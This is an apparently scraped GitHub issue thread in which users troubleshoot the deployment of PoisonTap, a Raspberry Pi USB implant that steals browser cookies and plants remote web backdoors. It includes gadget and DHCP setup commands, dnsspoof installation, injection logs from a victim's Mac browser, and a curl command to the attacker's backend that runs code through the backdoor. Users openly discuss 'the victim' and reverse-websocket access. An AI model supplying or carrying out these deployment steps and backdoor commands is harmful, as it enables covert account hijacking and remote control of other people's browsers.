Comments (28)
Hmm, there may be some initial setup that I forgot to cover -- check the modular section here:
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
from poisontap.
@samyk And what is the dhcpd.conf configuration ? I tried but the adapter gives to the user a 169.254.X.X address automatically...
from poisontap.
I recommend splitting pi_startup.sh into a pi_config.sh and a bash script which is run on startup.
Also, you can add these lines to a config script to setup the pi as a usb gadget and install dependancies:
echo "dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether" > /boot/cmdline.txt
echo "" >> /boot/config.txt
echo "dtoverlay=dwc2" >> /boot/config.txt
apt-get update && apt-get upgrade
apt-get install dsniff isc-dhcp-server nodejs screen
I'm unsure exactly which package you use for the dhcp server- apt-get installs udhcpd when trying to install dhcpd. Also, there is a package node as well as a package nodejs.
The main issue I'm facing is the dhcp server daemon fails to start-- obviously we listen for dhcp requests on usb0, but I haven't deduced the scope yet.
from poisontap.
@tomnick backend_server.js is a pretty simple script, if you read it you should be able to see how it works. I've not got anything open right now but I'm pretty sure you can just do a http request to:
yourserver.com:port/exec?your_code_here
See Samy's examples in the readme:
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
from poisontap.
Try: sudo npm -g install websocket
Also, make sure you're on Node v6.
from poisontap.
This is it...working...thanks a lot...
from poisontap.
Also, dsniff (which contains dnsspoof), screen, node.js, and dhcpd need to be installed (via apt-get should be fine)
from poisontap.
@jreziga Added dhcpd.conf in 838a035
from poisontap.
@tomnick With @ForeverRising's instructions and 838a035 do things work properly for you?
from poisontap.
I've also added some additional installation instructions in 26dd781
from poisontap.
There are still issues on my side.
DHCP server can't start well
not much informations on log...
dhcpd.conf is the same you just provided
Still troubleshooting I'll post here if I find smthg
from poisontap.
Ah, also need to set the IP up:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
Then reboot and test
from poisontap.
@samyk I was writing a post to ask your /etc/network/interfaces file, nice move ;)
Edit: Alright it worked !
from poisontap.
I used /etc/dhcpd.conf for the static IP. Does editing the interfaces file
work for you?
On Nov 18, 2016 3:45 PM, "jreziga" [email protected] wrote:
@samyk https://github.com/samyk I was writing a post to ask you your
/etc/network/interfaces file, nice move ;)—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
#19 (comment), or mute
the thread
https://github.com/notifications/unsubscribe-auth/AQOvAQZwFNniwEGJLDfyI20v0SzEOk6tks5q_iqKgaJpZM4K2qTF
.
from poisontap.
@ForeverRising dhcpd.conf goes inside /etc/dhcp/dhcpd.conf
and not in /etc/dhcpd.conf
Plus you need to run echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
(try logged as root, I was unable to do this with that one line command using sudo)
And yes it worked.
@samyk I'm playing with it now. I'm still having some questions like :
- If the victim has on his browser "nfl.com" opened. Is it working directly when you plug the Rpi ? Or do the user need to refresh the page on his browser ? (It seems like the 1st scenario isn't working or am I doing smthg wrong ?).
Edit: Solved. No refresh needed just patience for this one :D (but still the reverse websocket issue :c )
Also I've setup my server with port 1337 wide open but I can't get any reverse websocket connection.
In the Rpi logs I see that backdoor.html is injected
>>> Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
connection: 'keep-alive',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
accept: 'image/webp,image/*,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, sdch',
'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }
But nothing on the node server console output
Edit: Solved. My bad "Remotely Accessible Web-Based Backdoors" is available only for CDN js files included in webpages
from poisontap.
I'll try again with a sudo su -. What does
ip a show with the static (set with the interfaces file)?
NFL.com seemed to reload every minute or so, I think it was chosen for the
example for this reason. I haven't looked at the source and meta tags for
the site though.
Also, I don't use newline characters in an echo command. Just habit for me.
On Nov 18, 2016 4:52 PM, "jreziga" [email protected] wrote:
@ForeverRising https://github.com/foreverrising dhcpd.conf goes inside
/etc/dhcp/dhcpd.conf and no /etc/dhcpd.confPlus you need to run echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0
inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >>
/etc/network/interfaces (try logged as root, I was unable to do this with
this one line command with sudo)And yes it worked.
@samyk https://github.com/samyk I'm playing with it now. I'm still
having some questions like :
- If the victime had on his browser "nfl.com" opened. Is it working
directly when you plug the Rpi ? Or do the user need to refresh the page on
his browser ? (It seems like the 1st scenario isn't working or am I doing
smthg wrong ?)I've setup my server with port 1337 wide open but I can't get any reverse
websocket connection.
In the Rpi logs I see that backdoor.html is injectedInject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
connection: 'keep-alive',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
accept: 'image/webp,image/,/*;q=0.8',
'accept-encoding': 'gzip, deflate, sdch',
'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }But nothing on the node server console output
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
#19 (comment), or mute
the thread
https://github.com/notifications/unsubscribe-auth/AQOvAbtBE4GV1iiV8xK7vK_wANFLs1H3ks5q_jpKgaJpZM4K2qTF
.
from poisontap.
@ForeverRising I've made a small installation guide. Check at the bottom of this page: https://github.com/jreziga/poisontap/blob/068c2836deb61b150946acf3395ccf11eb3b3ad1/README.md
from poisontap.
Alright, mine is running now like a charme... is there any instruction on how to use the tools like backend_server.js or how to access remotely etc?
from poisontap.
Also note the backdoor has jQuery built in so you have full access to jQuery functionality
from poisontap.
Which websocket library is the project based on?
from poisontap.
https://www.npmjs.com/package/websocket
from poisontap.
Getting this error on my server trying to install in the directory "poisontap" with the "backend_server.js" file included only:
npm
install websocket
[email protected] install /root/node_modules/websocket
(node-gyp rebuild 2> builderror.log) || (exit 0)
/root
├── [email protected]
└── [email protected]
npm WARN enoent ENOENT: no such file or directory, open '/root/package.json'
npm WARN root No description
npm WARN root No repository field.
npm WARN root No README data
npm WARN root No license field.
from poisontap.
Should add package npm to the apt-get line of the script and a npm -g
websocket line as well.
On Nov 20, 2016 12:45 PM, "tomnick" [email protected] wrote:
This is it...working...thanks a lot...
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
#19 (comment), or mute
the thread
https://github.com/notifications/unsubscribe-auth/AQOvARiTPz1ffgKDgTisFtpzr3tIu1rDks5rAJU5gaJpZM4K2qTF
.
from poisontap.
Worth noting that the ReadMe says that NodeJS may already be installed. Yes, it is, but a very old version (0.10.29??) so you need to install this v6.
First you need to remove all references to the current version 👍
sudo apt-get remove nodered -y
sudo apt-get remove nodejs nodejs-legacy -y
sudo apt-get remove npm -y
then:
wget https://nodejs.org/dist/latest-v6.x/node-v6.9.1-linux-armv6l.tar.gz
tar -xvf node-v6.9.1-linux-armv6l.tar.gz
cd node-v6.9.1-linux-armv6l
sudo cp -R * /usr/local/
sudo reboot
Now you have an updated version of Node that will run just fine.
from poisontap.
Did exact what you wrote and the results after reboot are:
node -v
The program 'node' is currently not installed. You can install it by typing:
apt install nodejs-legacy
So after I did intall nodejs-legacy:
node -v
v4.2.6
No v6!
from poisontap.
I've just reformatted so that it's obvious that each is a seperate command, can't just copy and paste the whole line...
Pretty sure you need v6 and up.
from poisontap.
Which directory to unpack the top Alexa?
from poisontap.
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
net.ipv4.ip_forward = 1
How do you solve this problem? Ask the great god for help
from poisontap.
Related Issues (20)
- No auto-Response from browser even ip address is successfully obtained (Mac)
- Backend_server not working HOT 4
- PoisonTap server running on LAN HOT 1
- IPv6? HOT 1
- Cookies file not generated on poisontap HOT 2
- target_backdoor.js HOT 4
- Help with Cookies log HOT 1
- Not working while locked on windows 10, works fine when unlocked HOT 1
- DnsSpoof
- Defense against PoisonTap HOT 1
- can you delete saved cookies from the file?
- Is it still working now? HOT 1
- Issue - 1.0.0.1 Help HOT 1
- Cookies not Siphoned HOT 1
- Can't reconnect to pi after PoisonTap is executed HOT 1
- Ki HOT 1
- Problem at installing HOT 1
- Flipper Zero HOT 4
- CCS and retrieve cookie files
- Stil learning the basics and need pointers on where to start
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from poisontap.